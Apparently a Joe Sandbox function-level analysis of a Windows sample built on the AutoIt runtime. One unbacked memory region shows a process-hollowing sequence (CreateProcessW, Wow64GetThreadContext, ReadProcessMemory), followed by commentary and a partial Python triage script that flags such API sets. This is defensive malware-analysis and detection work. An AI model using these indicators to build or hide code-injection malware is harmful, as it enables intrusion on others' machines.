                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                  • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                  • API String ID: 2914291525-1005189915
                                                                  • Opcode ID: 6493c7e0d1a3f2e31ba5d39d27ae4669ee126da993d229c00dfa1f5a4d876d89
                                                                  • Instruction ID: 03dfaa4c8e4f710225eb5ff286a64c82dae456956cd23a985ec4e32b01fb33dc
                                                                  • Opcode Fuzzy Hash: 6493c7e0d1a3f2e31ba5d39d27ae4669ee126da993d229c00dfa1f5a4d876d89
                                                                  • Instruction Fuzzy Hash: 9421A4B5D41319AFDB01DFA5EC89BCDBBB8FB08700F00822AF615A62A0D7B545448F99

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 0039BDB4: __time64.LIBCMT ref: 0039BDBE
                                                                    • Part of subcall function 00354517: _fseek.LIBCMT ref: 0035452F
                                                                  • __wsplitpath.LIBCMT ref: 0039C083
                                                                    • Part of subcall function 00371DFC: __wsplitpath_helper.LIBCMT ref: 00371E3C
                                                                  • _wcscpy.LIBCMT ref: 0039C096
                                                                  • _wcscat.LIBCMT ref: 0039C0A9
                                                                  • __wsplitpath.LIBCMT ref: 0039C0CE
                                                                  • _wcscat.LIBCMT ref: 0039C0E4
                                                                  • _wcscat.LIBCMT ref: 0039C0F7
                                                                  • _wcscmp.LIBCMT ref: 0039C03E
                                                                    • Part of subcall function 0039C56D: _wcscmp.LIBCMT ref: 0039C65D
                                                                    • Part of subcall function 0039C56D: _wcscmp.LIBCMT ref: 0039C670
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 0039C2A1
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0039C338
                                                                  • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0039C34E
                                                                  • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0039C35F
                                                                  • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 0039C371
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                  • String ID:
                                                                  • API String ID: 2378138488-0
                                                                  • Opcode ID: 754895701d73b5d1a144c95707a90ab6d11e5f931a9fa02109fe52fac0b2b83e
                                                                  • Instruction ID: e3a9ccdb53f114a701ed2861b5b06f0856e91b556a393d3eb95fcd2f4cdb4972
                                                                  • Opcode Fuzzy Hash: 754895701d73b5d1a144c95707a90ab6d11e5f931a9fa02109fe52fac0b2b83e
                                                                  • Instruction Fuzzy Hash: F0C13CB1D10219AFDF26DF95CC81EDEB7BCAF49314F0080A6F609EA151DB749A848F61

                                                                  Control-flow Graph

                                                                  • Control-flow graph: entry block 353742-353762; the graph data is not reproduced here (its blocks reference DefWindowProcW, PostQuitMessage, SetTimer, RegisterWindowMessageW, CreatePopupMenu, KillTimer, MoveWindow and SetFocus)
                                                                  APIs
                                                                  • DefWindowProcW.USER32(?,?,?,?), ref: 003537B3
                                                                  • KillTimer.USER32(?,00000001), ref: 003537DD
                                                                  • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00353800
                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0035380B
                                                                  • CreatePopupMenu.USER32 ref: 0035381F
                                                                  • PostQuitMessage.USER32(00000000), ref: 0035382E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                  • String ID: TaskbarCreated
                                                                  • API String ID: 129472671-2362178303
                                                                  • Opcode ID: c80e387fc5c3d315eafd87ab1724e73b2ccb55f5f3098560f9cbbb8cc9140b2b
                                                                  • Instruction ID: 85d0dd10fee14d2d54409a1128448b0804ed1a78b0951ca54615a96b37b4355c
                                                                  • Opcode Fuzzy Hash: c80e387fc5c3d315eafd87ab1724e73b2ccb55f5f3098560f9cbbb8cc9140b2b
                                                                  • Instruction Fuzzy Hash: 81416BF5A00245A7DB175B68EC4AFBA3B5DF709382F00812AFE12C65F1CB609E589365

                                                                  Control-flow Graph

                                                                  APIs
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00353E79
                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00353E88
                                                                  • LoadIconW.USER32(00000063), ref: 00353E9E
                                                                  • LoadIconW.USER32(000000A4), ref: 00353EB0
                                                                  • LoadIconW.USER32(000000A2), ref: 00353EC2
                                                                    • Part of subcall function 00354024: LoadImageW.USER32(00350000,00000063,00000001,00000010,00000010,00000000), ref: 00354048
                                                                  • RegisterClassExW.USER32(?), ref: 00353F30
                                                                    • Part of subcall function 00353F53: GetSysColorBrush.USER32(0000000F), ref: 00353F86
                                                                    • Part of subcall function 00353F53: RegisterClassExW.USER32(00000030), ref: 00353FB0
                                                                    • Part of subcall function 00353F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00353FC1
                                                                    • Part of subcall function 00353F53: InitCommonControlsEx.COMCTL32(?), ref: 00353FDE
                                                                    • Part of subcall function 00353F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00353FEE
                                                                    • Part of subcall function 00353F53: LoadIconW.USER32(000000A9), ref: 00354004
                                                                    • Part of subcall function 00353F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00354013
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                  • String ID: #$0$AutoIt v3
                                                                  • API String ID: 423443420-4155596026
                                                                  • Opcode ID: 1c853cf911860c30c7a85c56dd760ba06868b8e440681de36200b62d5cd4c0b5
                                                                  • Instruction ID: ed1e8cb2ed983b099a512441d349d5ae4a947646cf024fd51083c92fd4236cae
                                                                  • Opcode Fuzzy Hash: 1c853cf911860c30c7a85c56dd760ba06868b8e440681de36200b62d5cd4c0b5
                                                                  • Instruction Fuzzy Hash: 992128B4E00304AFCB01DFA9EC4AAD9BFF5EB48310F10822AE714A62B1D77546448B99

                                                                  Control-flow Graph

                                                                  • Control-flow graph: entry block fd9108-fd91b6; the graph data is not reproduced here (its blocks reference CreateFileW, VirtualAlloc, ReadFile, CloseHandle and VirtualFree)
                                                                  APIs
                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00FD91D9
                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FD93FF
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileFreeVirtual
                                                                  • String ID:
                                                                  • API String ID: 204039940-0
                                                                  • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                  • Instruction ID: 369ed9281cebf0fddcacdbcbd92bd56e5c830aee596a8a980699ad2faa3dc210
                                                                  • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                  • Instruction Fuzzy Hash: 08A11871E04209EBDB14CFE4C898BEEB7B6BF48315F24815AE105BB380D7B59A41EB54

                                                                  Control-flow Graph

                                                                  • Control-flow graph: entry block 3549fb-354a25; the graph data is not reproduced here (its blocks reference RegOpenKeyExW, RegQueryValueExW and RegCloseKey)
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00354A1D
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003C41DB
                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003C421A
                                                                  • RegCloseKey.ADVAPI32(?), ref: 003C4249
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: QueryValue$CloseOpen
                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                  • API String ID: 1586453840-614718249
                                                                  • Opcode ID: 2f087b91a6362cf27f20929a62746ffb2ca39faf0334a16917ad01842bed198c
                                                                  • Instruction ID: a7466d0ccaef5bfd4608b2f816f2688eb6d435c99a70188919b60ae2d4efa470
                                                                  • Opcode Fuzzy Hash: 2f087b91a6362cf27f20929a62746ffb2ca39faf0334a16917ad01842bed198c
                                                                  • Instruction Fuzzy Hash: E2117C71A01108BFEB06ABA4DD86EFF7BBCEF04744F104069F512E61A1EA71AE45DB50

                                                                  Control-flow Graph

                                                                  • Control-flow graph: single basic block 3536b8-353728 calling CreateWindowExW (twice) and ShowWindow (twice)
                                                                  APIs
                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 003536E6
                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00353707
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00353AA3,?), ref: 0035371B
                                                                  • ShowWindow.USER32(00000000,?,?,?,?,00353AA3,?), ref: 00353724
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Window$CreateShow
                                                                  • String ID: AutoIt v3$edit
                                                                  • API String ID: 1584632944-3779509399
                                                                  • Opcode ID: d7a3d5ade888e5201ed753053cbe93c6cbfd6b0692513ba28e0d82cd5c21d873
                                                                  • Instruction ID: 822d4f971cba0bbee31a03beb865e491c7de387d3ce6db0d91beb9c5a6e11111
                                                                  • Opcode Fuzzy Hash: d7a3d5ade888e5201ed753053cbe93c6cbfd6b0692513ba28e0d82cd5c21d873
                                                                  • Instruction Fuzzy Hash: 06F03A74A412D07AE7315B57AC48EB73E7DD7CAF20F00802BBB04A21B0C1610991CAB8

                                                                  Control-flow Graph

                                                                  • Control-flow graph: entry block fd8ee8-fd9005; the graph data is not reproduced here (its blocks reference CreateFileW, VirtualAlloc, ReadFile and ExitProcess)
                                                                  APIs
                                                                    • Part of subcall function 00FD8DD8: Sleep.KERNELBASE(000001F4), ref: 00FD8DE9
                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FD8FFB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFileSleep
                                                                  • String ID: CRR6TRB744H34P0KA
                                                                  • API String ID: 2694422964-3463989640
                                                                  • Opcode ID: cb411de4fc0232fc41f924c645a727bfccf3b054f599b272238f301e6dd598a4
                                                                  • Instruction ID: 603d5183a7608163e7d3757787a3dc08cd7aba93eca98a5be4ddcdef3053e3e5
                                                                  • Opcode Fuzzy Hash: cb411de4fc0232fc41f924c645a727bfccf3b054f599b272238f301e6dd598a4
                                                                  • Instruction Fuzzy Hash: ED51C331D04258DAEF11EBF4C858BEEBB79AF14300F044199E609BB2C1D7B90B49DBA5

                                                                  Control-flow Graph

                                                                  APIs
                                                                    • Part of subcall function 00355374: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00411148,?,003561FF,?,00000000,00000001,00000000), ref: 00355392
                                                                    • Part of subcall function 003549FB: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00354A1D
                                                                  • _wcscat.LIBCMT ref: 003C2D80
                                                                  • _wcscat.LIBCMT ref: 003C2DB5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _wcscat$FileModuleNameOpen
                                                                  • String ID: 8!A$\$\Include\
                                                                  • API String ID: 3592542968-157268276
                                                                  • Opcode ID: 4ff9e9063918e7480f9a1dfcb69c5c02b892569837855d1c1be8a47434472b14
                                                                  • Instruction ID: 8c7dba7393d096cf9cd77ed66316344581051a18968b838a2310c4371f9d6dda
                                                                  • Opcode Fuzzy Hash: 4ff9e9063918e7480f9a1dfcb69c5c02b892569837855d1c1be8a47434472b14
                                                                  • Instruction Fuzzy Hash: 37518175404340AFC716EF65EA82CDAB3F4FE59300B40853EFA45DB261DBB09A58CB5A
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 0035522F
                                                                  • _wcscpy.LIBCMT ref: 00355283
                                                                  • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00355293
                                                                  • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 003C3CB0
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: IconLoadNotifyShell_String_memset_wcscpy
                                                                  • String ID: Line:
                                                                  • API String ID: 1053898822-1585850449
                                                                  • Opcode ID: 9ee028691edbab08b5be99365a7ad56982a8d0ff82346d910cec82fbeda357a6
                                                                  • Instruction ID: 0053f2412585351fb58c40d29294aaaa4879950abcfb3b13649522ddb96bb52f
                                                                  • Opcode Fuzzy Hash: 9ee028691edbab08b5be99365a7ad56982a8d0ff82346d910cec82fbeda357a6
                                                                  • Instruction Fuzzy Hash: 0631A171408740AEC722EB60DC52FDE7BD8AB44311F10891AFA85961B1DB74A64C8B9A
                                                                  APIs
                                                                    • Part of subcall function 003541A9: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,003539FE,?,00000001), ref: 003541DB
                                                                  • _free.LIBCMT ref: 003C36B7
                                                                  • _free.LIBCMT ref: 003C36FE
                                                                    • Part of subcall function 0035C833: __wsplitpath.LIBCMT ref: 0035C93E
                                                                    • Part of subcall function 0035C833: _wcscpy.LIBCMT ref: 0035C953
                                                                    • Part of subcall function 0035C833: _wcscat.LIBCMT ref: 0035C968
                                                                    • Part of subcall function 0035C833: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0035C978
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: _free$CurrentDirectoryLibraryLoad__wsplitpath_wcscat_wcscpy
                                                                  • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                                  • API String ID: 805182592-1757145024
                                                                  • Opcode ID: ed501be647fa589946237ec9b60fb97a8493a43ff00f096c71e85377d1d60862
                                                                  • Instruction ID: 128078afdbf1fd74fc53cdd1fce967645bcf0050823bab7a8995d7d23be3e7b6
                                                                  • Opcode Fuzzy Hash: ed501be647fa589946237ec9b60fb97a8493a43ff00f096c71e85377d1d60862
                                                                  • Instruction Fuzzy Hash: 8E913C71910219AFCF06EFA5CC91EEEB7B4BF05314F108429E816EB291DB749E54CB90
                                                                  APIs
                                                                  • _memset.LIBCMT ref: 003C3725
                                                                  • GetOpenFileNameW.COMDLG32 ref: 003C376F
                                                                    • Part of subcall function 0035660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003553B1,?,?,003561FF,?,00000000,00000001,00000000), ref: 0035662F
                                                                    • Part of subcall function 003540A7: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 003540C6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Name$Path$FileFullLongOpen_memset
                                                                  • String ID: X$t3@
                                                                  • API String ID: 3777226403-811511634
                                                                  • Opcode ID: 80d292850c7fd5e73ee4ed828ab99327c6fd77f5254f8612c140aba703285076
                                                                  • Instruction ID: 7d755013b7a8c98a378b8fd904379d0e766fe550d6e05455820c9e29b8025ed8
                                                                  • Opcode Fuzzy Hash: 80d292850c7fd5e73ee4ed828ab99327c6fd77f5254f8612c140aba703285076
                                                                  • Instruction Fuzzy Hash: 1421C671A001989BCB16DF94C845BDE7BFC9F48305F00806AE805FB291DBB85A898F65
                                                                  APIs
                                                                  • __getstream.LIBCMT ref: 003734FE
                                                                    • Part of subcall function 00377C0E: __getptd_noexit.LIBCMT ref: 00377C0E
                                                                  • @_EH4_CallFilterFunc@8.LIBCMT ref: 00373539
                                                                  • __wopenfile.LIBCMT ref: 00373549
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CallFilterFunc@8__getptd_noexit__getstream__wopenfile
                                                                  • String ID: <G
                                                                  • API String ID: 1820251861-2138716496
                                                                  • Opcode ID: b7d519080c33f07ffd07f0dd6d4eac7acc750d7c393ddbb8f94ee97c6dabe1c0
                                                                  • Instruction ID: d5267fb7ac0260d643847c508c46fc6d9b37e9033801d6d57269edb75b21dd7e
                                                                  • Opcode Fuzzy Hash: b7d519080c33f07ffd07f0dd6d4eac7acc750d7c393ddbb8f94ee97c6dabe1c0
                                                                  • Instruction Fuzzy Hash: 92110A71A0021A9BDB37BF758C4266E36E4AF09760B15C425E41DDF181EB3CCA11E7A1
                                                                  APIs
                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0036D28B,SwapMouseButtons,00000004,?), ref: 0036D2BC
                                                                  • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,0036D28B,SwapMouseButtons,00000004,?,?,?,?,0036C865), ref: 0036D2DD
                                                                  • RegCloseKey.KERNELBASE(00000000,?,?,0036D28B,SwapMouseButtons,00000004,?,?,?,?,0036C865), ref: 0036D2FF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1349274345.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                                  • Associated: 00000000.00000002.1349186401.0000000000350000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003DD000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349326574.00000000003FE000.00000002.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349406250.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                  • Associated: 00000000.00000002.1349467514.0000000000414000.00000002.00000001.01000000.00000003.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_350000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpenQueryValue
                                                                  • String ID: Control Panel\Mouse
                                                                  • API String ID: 3677997916-824357125
                                                                  • Opcode ID: 696734406a517583783f8cd8ee3108558abfab0d20938609aa774cb80e4812d5
                                                                  • Instruction ID: 037af984c31e45d2eba1667da4110afde09ec037f8c7c70a7ba3b545e39f19c1
                                                                  • Opcode Fuzzy Hash: 696734406a517583783f8cd8ee3108558abfab0d20938609aa774cb80e4812d5
                                                                  • Instruction Fuzzy Hash: 1A113979A11208BFDB228FA4DC84EAF7BBCEF44744F108869E805D7214E731AE419B60
                                                                  APIs
                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 00FD8593
                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00FD8629
                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00FD864B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.1350999171.0000000000FD6000.00000040.00000020.00020000.00000000.sdmp, Offset: 00FD6000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_fd6000_xaqnaB0rcW.jbxd
                                                                  Similarity
                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                  • String ID:
                                                                  • API String ID: 2438371351-0
                                                                  • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                  • Instruction ID: 1de679feda84a014c9bbca53a0e13dcb5618b8d98cb6ef742248210616b017a1
                                                                  • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                  • Instruction Fuzzy Hash: 9F621E30A142189BEB24DFA4C850BDEB376FF58700F1491A9D10DEB390EB759E81DB5A
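The function at offset 00FD6000 above sits in memory that is not backed by a PE image ("based on PE: false") and combines CreateProcessW, Wow64GetThreadContext and ReadProcessMemory, the usual opening of a process-hollowing routine (spawn the target, fetch its thread context, read the PEB to locate the image base). Earlier entries carry the AutoIt runtime's ">>>AUTOIT SCRIPT<<<" marker and the "aut" prefix it passes to GetTempFileNameW. The script below is an added example, not Joe Sandbox code and not part of this report: it parses blocks in the format shown on this page and surfaces exactly those indicators. The process-tampering API set and the finding names are this example's own heuristics, and the embedded SAMPLE text is constructed from entries on this page.

```python
"""Triage helper for a Joe Sandbox "IDA Plugin" function listing.

Added example, not Joe Sandbox code.  It parses per-function blocks
(APIs / Memory Dump Source / Similarity) and flags (a) functions that use
several process-tampering APIs, noting whether the code is PE-image backed,
and (b) AutoIt runtime indicators (the ">>>AUTOIT SCRIPT<<<" marker and the
"aut" prefix passed to GetTempFileNameW).  The API set and finding names are
this example's own heuristics; SAMPLE is constructed from entries on the page.
"""
import re
from dataclasses import dataclass, field
from typing import List, Optional

SAMPLE = """\
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00FD8593
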